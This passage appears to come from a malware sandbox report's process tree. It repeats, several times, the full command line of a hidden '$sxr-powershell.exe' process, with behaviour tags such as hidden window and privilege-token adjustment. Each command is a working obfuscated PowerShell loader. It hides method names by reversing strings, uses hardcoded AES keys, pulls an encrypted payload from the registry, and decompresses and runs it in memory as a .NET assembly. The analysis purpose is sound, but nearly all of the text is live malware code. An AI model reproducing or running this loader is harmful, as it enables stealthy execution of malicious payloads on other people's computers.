= $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($AarSr, 0, $AarSr.Length);$AarSr = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($AarSr);$jKHVk = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Bw7IB5l0nDJz4V/yoKrAmg==');$jKHVk = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jKHVk, 0, $jKHVk.Length);$jKHVk = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jKHVk);$BvkGZ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('AF0yFBzJZFVK0sW/C+0yOA==');$BvkGZ = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BvkGZ, 0, $BvkGZ.Length);$BvkGZ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BvkGZ);$KJTnP = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('IzMxK6yRkvNAq3b86ckOZw==');$KJTnP = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KJTnP, 0, $KJTnP.Length);$KJTnP = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KJTnP);$TjsNY0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XQk0rQ8HHWmKAJLDXLuouQ==');$TjsNY0 = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($TjsNY0, 0, $TjsNY0.Length);$TjsNY0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($TjsNY0);$TjsNY1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('owtqeXTsnLcs3cgKbzagCA==');$TjsNY1 = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($TjsNY1, 0, $TjsNY1.Length);$TjsNY1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($TjsNY1);$TjsNY2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2RVrgdRC9/qmCG1cuVpcPg==');$TjsNY2 = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($TjsNY2, 0, $TjsNY2.Length);$TjsNY2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($TjsNY2);$TjsNY3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Bl9qQJYdA2YNQzYMsVAcjg==');$TjsNY3 = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($TjsNY3, 0, $TjsNY3.Length);$TjsNY3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($TjsNY3);$qGrKR.Dispose();$pdyuP1.Dispose();$TSIUN = [Microsoft.Win32.Registry]::$BvkGZ.$jKHVk($TjsNY).$AarSr($qvqLZ);$yZizz=[string[]]$TSIUN.Split('\');$yPDZH=FCxri(pxzLS([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($yZizz[1])));OSlRe $yPDZH (,[string[]] ('%*'));$QEiEV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($yZizz[0]);$pdyuP = New-Object System.Security.Cryptography.AesManaged;$pdyuP.Mode = [System.Security.Cryptography.CipherMode]::CBC;$pdyuP.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$pdyuP.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('OxaIu4LBH0NHXzEF0JWKUmNYy+n9ONi+4jCixaR9o/s=');$pdyuP.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('uNCooA8rmnbarKZacn6rVw==');$FYZzj = $pdyuP.('rotpyrceDetaerC'[-1..-15] -join '')();$QEiEV = $FYZzj.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($QEiEV, 0, $QEiEV.Length);$FYZzj.Dispose();$pdyuP.Dispose();$NTbes = New-Object System.IO.MemoryStream(, $QEiEV);$DmFpj = New-Object System.IO.MemoryStream;$FsdiJ = New-Object System.IO.Compression.GZipStream($NTbes, [IO.Compression.CompressionMode]::$TjsNY1);$FsdiJ.$KJTnP($DmFpj);$FsdiJ.Dispose();$NTbes.Dispose();$DmFpj.Dispose();$QEiEV = $DmFpj.ToArray();$soNjb = $LRYKC | IEX;$HlzxU = $soNjb::$TjsNY2($QEiEV);$rrXdx = $HlzxU.EntryPoint;$rrXdx.$TjsNY0($null, (, [string[]] ($FNruO)))5⤵
- Executes dropped EXE
- Hide Artifacts: Hidden Window
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1852
-
-
C:\Windows\$sxr-powershell.exe"C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(1520).WaitForExit();[System.Threading.Thread]::Sleep(5000); function pxzLS($faFmv){ $pdyuP=[System.Security.Cryptography.Aes]::Create(); $pdyuP.Mode=[System.Security.Cryptography.CipherMode]::CBC; $pdyuP.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $pdyuP.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('OxaIu4LBH0NHXzEF0JWKUmNYy+n9ONi+4jCixaR9o/s='); $pdyuP.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('uNCooA8rmnbarKZacn6rVw=='); $FYZzj=$pdyuP.('rotpyrceDetaerC'[-1..-15] -join '')(); $KNYFp=$FYZzj.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($faFmv, 0, $faFmv.Length); $FYZzj.Dispose(); $pdyuP.Dispose(); $KNYFp;}function FCxri($faFmv){ $NTbes=New-Object System.IO.MemoryStream(,$faFmv); $DmFpj=New-Object System.IO.MemoryStream; $FsdiJ=New-Object System.IO.Compression.GZipStream($NTbes, [IO.Compression.CompressionMode]::Decompress); $FsdiJ.CopyTo($DmFpj); $FsdiJ.Dispose(); $NTbes.Dispose(); $DmFpj.Dispose(); $DmFpj.ToArray();}function OSlRe($faFmv,$leBfz){ $HlzxU=[System.Reflection.Assembly]::Load([byte[]]$faFmv); $rrXdx=$HlzxU.EntryPoint; $rrXdx.Invoke($null, $leBfz);}$pdyuP1 = New-Object System.Security.Cryptography.AesManaged;$pdyuP1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$pdyuP1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$pdyuP1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('OxaIu4LBH0NHXzEF0JWKUmNYy+n9ONi+4jCixaR9o/s=');$pdyuP1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('uNCooA8rmnbarKZacn6rVw==');$qGrKR = $pdyuP1.('rotpyrceDetaerC'[-1..-15] -join '')();$TjsNY = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('d6Q+LrrhAwyK1uipjOqPxg==');$TjsNY = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($TjsNY, 0, $TjsNY.Length);$TjsNY = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($TjsNY);$qvqLZ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('69yeuXffs7ux/zA0YMGKH3dmXSz0P4vgJbmfiMXrzCM=');$qvqLZ = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($qvqLZ, 0, $qvqLZ.Length);$qvqLZ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($qvqLZ);$FNruO = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('WyXwngz2uglRO6ZAcrg6Ag==');$FNruO = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($FNruO, 0, $FNruO.Length);$FNruO = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($FNruO);$LRYKC = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('u823wux5O4Fbh5eDFp/+ca2kjBZPfjXdKRiYm5lEi1/uPVvdi4VTw3Skyjvq+xkGRh3uxdMK5Yl30J7OmCvscDDWsBj5l/abJMk7R3rtVFuMmO2mOI8eJ68DpzNoAWbwuQ8vVlvfanC/+gVlAdicm4rn+Kxx0kjBxYQkdhDX8XhlvH9ZzMTYkQh7CAVDqjxzKnDzYFw26lZKBQhJ3luRhFBABAcYg16uXMiNBWXm1Frbp6IbtOgcTJ6GmJT6oeUkTVubIhdaLB7VUJXskuFV2zuoBiAtc2u4ckc48tqLxmOJeVGxobT7YO+ZwoLAQ2B6CuhEmiJDGCKp8eDtuz1gb9zd988pQle6YLnHJpMVjNFOoRCNp14ETcLqZFSwo1TzN6HzbvND0c1LW97hv8uasfQXsb6Vx6v7acbKM+Gce90=');$LRYKC = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($LRYKC, 0, $LRYKC.Length);$LRYKC = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($LRYKC);$oSnpH = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('nSzPWxfvLItLrY6odHpw1Q==');$oSnpH = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($oSnpH, 0, $oSnpH.Length);$oSnpH = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($oSnpH);$AarSr = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2IqKtZxS/FqcdHbBUDZbWg==');$AarSr = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($AarSr, 0, $AarSr.Length);$AarSr = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($AarSr);$jKHVk = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Bw7IB5l0nDJz4V/yoKrAmg==');$jKHVk = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jKHVk, 0, $jKHVk.Length);$jKHVk = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jKHVk);$BvkGZ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('AF0yFBzJZFVK0sW/C+0yOA==');$BvkGZ = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BvkGZ, 0, $BvkGZ.Length);$BvkGZ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BvkGZ);$KJTnP = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('IzMxK6yRkvNAq3b86ckOZw==');$KJTnP = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KJTnP, 0, $KJTnP.Length);$KJTnP = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KJTnP);$TjsNY0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XQk0rQ8HHWmKAJLDXLuouQ==');$TjsNY0 = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($TjsNY0, 0, $TjsNY0.Length);$TjsNY0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($TjsNY0);$TjsNY1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('owtqeXTsnLcs3cgKbzagCA==');$TjsNY1 = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($TjsNY1, 0, $TjsNY1.Length);$TjsNY1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($TjsNY1);$TjsNY2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2RVrgdRC9/qmCG1cuVpcPg==');$TjsNY2 = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($TjsNY2, 0, $TjsNY2.Length);$TjsNY2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($TjsNY2);$TjsNY3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Bl9qQJYdA2YNQzYMsVAcjg==');$TjsNY3 = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($TjsNY3, 0, $TjsNY3.Length);$TjsNY3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($TjsNY3);$qGrKR.Dispose();$pdyuP1.Dispose();$TSIUN = [Microsoft.Win32.Registry]::$BvkGZ.$jKHVk($TjsNY).$AarSr($qvqLZ);$yZizz=[string[]]$TSIUN.Split('\');$yPDZH=FCxri(pxzLS([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($yZizz[1])));OSlRe $yPDZH (,[string[]] ('%*'));$QEiEV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($yZizz[0]);$pdyuP = New-Object System.Security.Cryptography.AesManaged;$pdyuP.Mode = [System.Security.Cryptography.CipherMode]::CBC;$pdyuP.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$pdyuP.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('OxaIu4LBH0NHXzEF0JWKUmNYy+n9ONi+4jCixaR9o/s=');$pdyuP.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('uNCooA8rmnbarKZacn6rVw==');$FYZzj = $pdyuP.('rotpyrceDetaerC'[-1..-15] -join '')();$QEiEV = $FYZzj.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($QEiEV, 0, $QEiEV.Length);$FYZzj.Dispose();$pdyuP.Dispose();$NTbes = New-Object System.IO.MemoryStream(, $QEiEV);$DmFpj = New-Object System.IO.MemoryStream;$FsdiJ = New-Object System.IO.Compression.GZipStream($NTbes, [IO.Compression.CompressionMode]::$TjsNY1);$FsdiJ.$KJTnP($DmFpj);$FsdiJ.Dispose();$NTbes.Dispose();$DmFpj.Dispose();$QEiEV = $DmFpj.ToArray();$soNjb = $LRYKC | IEX;$HlzxU = $soNjb::$TjsNY2($QEiEV);$rrXdx = $HlzxU.EntryPoint;$rrXdx.$TjsNY0($null, (, [string[]] ($FNruO)))5⤵
- Executes dropped EXE
- Hide Artifacts: Hidden Window
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3568
-
-
C:\Windows\$sxr-powershell.exe"C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(1520).WaitForExit();[System.Threading.Thread]::Sleep(5000); function pxzLS($faFmv){ $pdyuP=[System.Security.Cryptography.Aes]::Create(); $pdyuP.Mode=[System.Security.Cryptography.CipherMode]::CBC; $pdyuP.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $pdyuP.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('OxaIu4LBH0NHXzEF0JWKUmNYy+n9ONi+4jCixaR9o/s='); $pdyuP.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('uNCooA8rmnbarKZacn6rVw=='); $FYZzj=$pdyuP.('rotpyrceDetaerC'[-1..-15] -join '')(); $KNYFp=$FYZzj.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($faFmv, 0, $faFmv.Length); $FYZzj.Dispose(); $pdyuP.Dispose(); $KNYFp;}function FCxri($faFmv){ $NTbes=New-Object System.IO.MemoryStream(,$faFmv); $DmFpj=New-Object System.IO.MemoryStream; $FsdiJ=New-Object System.IO.Compression.GZipStream($NTbes, [IO.Compression.CompressionMode]::Decompress); $FsdiJ.CopyTo($DmFpj); $FsdiJ.Dispose(); $NTbes.Dispose(); $DmFpj.Dispose(); $DmFpj.ToArray();}function OSlRe($faFmv,$leBfz){ $HlzxU=[System.Reflection.Assembly]::Load([byte[]]$faFmv); $rrXdx=$HlzxU.EntryPoint; $rrXdx.Invoke($null, $leBfz);}$pdyuP1 = New-Object System.Security.Cryptography.AesManaged;$pdyuP1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$pdyuP1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$pdyuP1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('OxaIu4LBH0NHXzEF0JWKUmNYy+n9ONi+4jCixaR9o/s=');$pdyuP1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('uNCooA8rmnbarKZacn6rVw==');$qGrKR = $pdyuP1.('rotpyrceDetaerC'[-1..-15] -join '')();$TjsNY = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('d6Q+LrrhAwyK1uipjOqPxg==');$TjsNY = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($TjsNY, 0, $TjsNY.Length);$TjsNY = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($TjsNY);$qvqLZ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('69yeuXffs7ux/zA0YMGKH3dmXSz0P4vgJbmfiMXrzCM=');$qvqLZ = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($qvqLZ, 0, $qvqLZ.Length);$qvqLZ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($qvqLZ);$FNruO = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('WyXwngz2uglRO6ZAcrg6Ag==');$FNruO = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($FNruO, 0, $FNruO.Length);$FNruO = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($FNruO);$LRYKC = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('u823wux5O4Fbh5eDFp/+ca2kjBZPfjXdKRiYm5lEi1/uPVvdi4VTw3Skyjvq+xkGRh3uxdMK5Yl30J7OmCvscDDWsBj5l/abJMk7R3rtVFuMmO2mOI8eJ68DpzNoAWbwuQ8vVlvfanC/+gVlAdicm4rn+Kxx0kjBxYQkdhDX8XhlvH9ZzMTYkQh7CAVDqjxzKnDzYFw26lZKBQhJ3luRhFBABAcYg16uXMiNBWXm1Frbp6IbtOgcTJ6GmJT6oeUkTVubIhdaLB7VUJXskuFV2zuoBiAtc2u4ckc48tqLxmOJeVGxobT7YO+ZwoLAQ2B6CuhEmiJDGCKp8eDtuz1gb9zd988pQle6YLnHJpMVjNFOoRCNp14ETcLqZFSwo1TzN6HzbvND0c1LW97hv8uasfQXsb6Vx6v7acbKM+Gce90=');$LRYKC = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($LRYKC, 0, $LRYKC.Length);$LRYKC = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($LRYKC);$oSnpH = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('nSzPWxfvLItLrY6odHpw1Q==');$oSnpH = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($oSnpH, 0, $oSnpH.Length);$oSnpH = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($oSnpH);$AarSr = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2IqKtZxS/FqcdHbBUDZbWg==');$AarSr = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($AarSr, 0, $AarSr.Length);$AarSr = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($AarSr);$jKHVk = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Bw7IB5l0nDJz4V/yoKrAmg==');$jKHVk = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jKHVk, 0, $jKHVk.Length);$jKHVk = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jKHVk);$BvkGZ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('AF0yFBzJZFVK0sW/C+0yOA==');$BvkGZ = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BvkGZ, 0, $BvkGZ.Length);$BvkGZ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BvkGZ);$KJTnP = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('IzMxK6yRkvNAq3b86ckOZw==');$KJTnP = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KJTnP, 0, $KJTnP.Length);$KJTnP = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KJTnP);$TjsNY0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XQk0rQ8HHWmKAJLDXLuouQ==');$TjsNY0 = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($TjsNY0, 0, $TjsNY0.Length);$TjsNY0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($TjsNY0);$TjsNY1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('owtqeXTsnLcs3cgKbzagCA==');$TjsNY1 = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($TjsNY1, 0, $TjsNY1.Length);$TjsNY1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($TjsNY1);$TjsNY2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2RVrgdRC9/qmCG1cuVpcPg==');$TjsNY2 = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($TjsNY2, 0, $TjsNY2.Length);$TjsNY2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($TjsNY2);$TjsNY3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Bl9qQJYdA2YNQzYMsVAcjg==');$TjsNY3 = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($TjsNY3, 0, $TjsNY3.Length);$TjsNY3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($TjsNY3);$qGrKR.Dispose();$pdyuP1.Dispose();$TSIUN = [Microsoft.Win32.Registry]::$BvkGZ.$jKHVk($TjsNY).$AarSr($qvqLZ);$yZizz=[string[]]$TSIUN.Split('\');$yPDZH=FCxri(pxzLS([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($yZizz[1])));OSlRe $yPDZH (,[string[]] ('%*'));$QEiEV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($yZizz[0]);$pdyuP = New-Object System.Security.Cryptography.AesManaged;$pdyuP.Mode = [System.Security.Cryptography.CipherMode]::CBC;$pdyuP.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$pdyuP.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('OxaIu4LBH0NHXzEF0JWKUmNYy+n9ONi+4jCixaR9o/s=');$pdyuP.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('uNCooA8rmnbarKZacn6rVw==');$FYZzj = $pdyuP.('rotpyrceDetaerC'[-1..-15] -join '')();$QEiEV = $FYZzj.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($QEiEV, 0, $QEiEV.Length);$FYZzj.Dispose();$pdyuP.Dispose();$NTbes = New-Object System.IO.MemoryStream(, $QEiEV);$DmFpj = New-Object System.IO.MemoryStream;$FsdiJ = New-Object System.IO.Compression.GZipStream($NTbes, [IO.Compression.CompressionMode]::$TjsNY1);$FsdiJ.$KJTnP($DmFpj);$FsdiJ.Dispose();$NTbes.Dispose();$DmFpj.Dispose();$QEiEV = $DmFpj.ToArray();$soNjb = $LRYKC | IEX;$HlzxU = $soNjb::$TjsNY2($QEiEV);$rrXdx = $HlzxU.EntryPoint;$rrXdx.$TjsNY0($null, (, [string[]] ($FNruO)))5⤵
- Executes dropped EXE
- Hide Artifacts: Hidden Window
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5020
-
-
C:\Windows\$sxr-powershell.exe"C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(1520).WaitForExit();[System.Threading.Thread]::Sleep(5000); function pxzLS($faFmv){ $pdyuP=[System.Security.Cryptography.Aes]::Create(); $pdyuP.Mode=[System.Security.Cryptography.CipherMode]::CBC; $pdyuP.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $pdyuP.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('OxaIu4LBH0NHXzEF0JWKUmNYy+n9ONi+4jCixaR9o/s='); $pdyuP.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('uNCooA8rmnbarKZacn6rVw=='); $FYZzj=$pdyuP.('rotpyrceDetaerC'[-1..-15] -join '')(); $KNYFp=$FYZzj.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($faFmv, 0, $faFmv.Length); $FYZzj.Dispose(); $pdyuP.Dispose(); $KNYFp;}function FCxri($faFmv){ $NTbes=New-Object System.IO.MemoryStream(,$faFmv); $DmFpj=New-Object System.IO.MemoryStream; $FsdiJ=New-Object System.IO.Compression.GZipStream($NTbes, [IO.Compression.CompressionMode]::Decompress); $FsdiJ.CopyTo($DmFpj); $FsdiJ.Dispose(); $NTbes.Dispose(); $DmFpj.Dispose(); $DmFpj.ToArray();}function OSlRe($faFmv,$leBfz){ $HlzxU=[System.Reflection.Assembly]::Load([byte[]]$faFmv); $rrXdx=$HlzxU.EntryPoint; $rrXdx.Invoke($null, $leBfz);}$pdyuP1 = New-Object System.Security.Cryptography.AesManaged;$pdyuP1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$pdyuP1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$pdyuP1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('OxaIu4LBH0NHXzEF0JWKUmNYy+n9ONi+4jCixaR9o/s=');$pdyuP1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('uNCooA8rmnbarKZacn6rVw==');$qGrKR = $pdyuP1.('rotpyrceDetaerC'[-1..-15] -join '')();$TjsNY = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('d6Q+LrrhAwyK1uipjOqPxg==');$TjsNY = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($TjsNY, 0, $TjsNY.Length);$TjsNY = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($TjsNY);$qvqLZ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('69yeuXffs7ux/zA0YMGKH3dmXSz0P4vgJbmfiMXrzCM=');$qvqLZ = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($qvqLZ, 0, $qvqLZ.Length);$qvqLZ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($qvqLZ);$FNruO = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('WyXwngz2uglRO6ZAcrg6Ag==');$FNruO = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($FNruO, 0, $FNruO.Length);$FNruO = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($FNruO);$LRYKC = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('u823wux5O4Fbh5eDFp/+ca2kjBZPfjXdKRiYm5lEi1/uPVvdi4VTw3Skyjvq+xkGRh3uxdMK5Yl30J7OmCvscDDWsBj5l/abJMk7R3rtVFuMmO2mOI8eJ68DpzNoAWbwuQ8vVlvfanC/+gVlAdicm4rn+Kxx0kjBxYQkdhDX8XhlvH9ZzMTYkQh7CAVDqjxzKnDzYFw26lZKBQhJ3luRhFBABAcYg16uXMiNBWXm1Frbp6IbtOgcTJ6GmJT6oeUkTVubIhdaLB7VUJXskuFV2zuoBiAtc2u4ckc48tqLxmOJeVGxobT7YO+ZwoLAQ2B6CuhEmiJDGCKp8eDtuz1gb9zd988pQle6YLnHJpMVjNFOoRCNp14ETcLqZFSwo1TzN6HzbvND0c1LW97hv8uasfQXsb6Vx6v7acbKM+Gce90=');$LRYKC = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($LRYKC, 0, $LRYKC.Length);$LRYKC = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($LRYKC);$oSnpH = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('nSzPWxfvLItLrY6odHpw1Q==');$oSnpH = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($oSnpH, 0, $oSnpH.Length);$oSnpH = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($oSnpH);$AarSr = 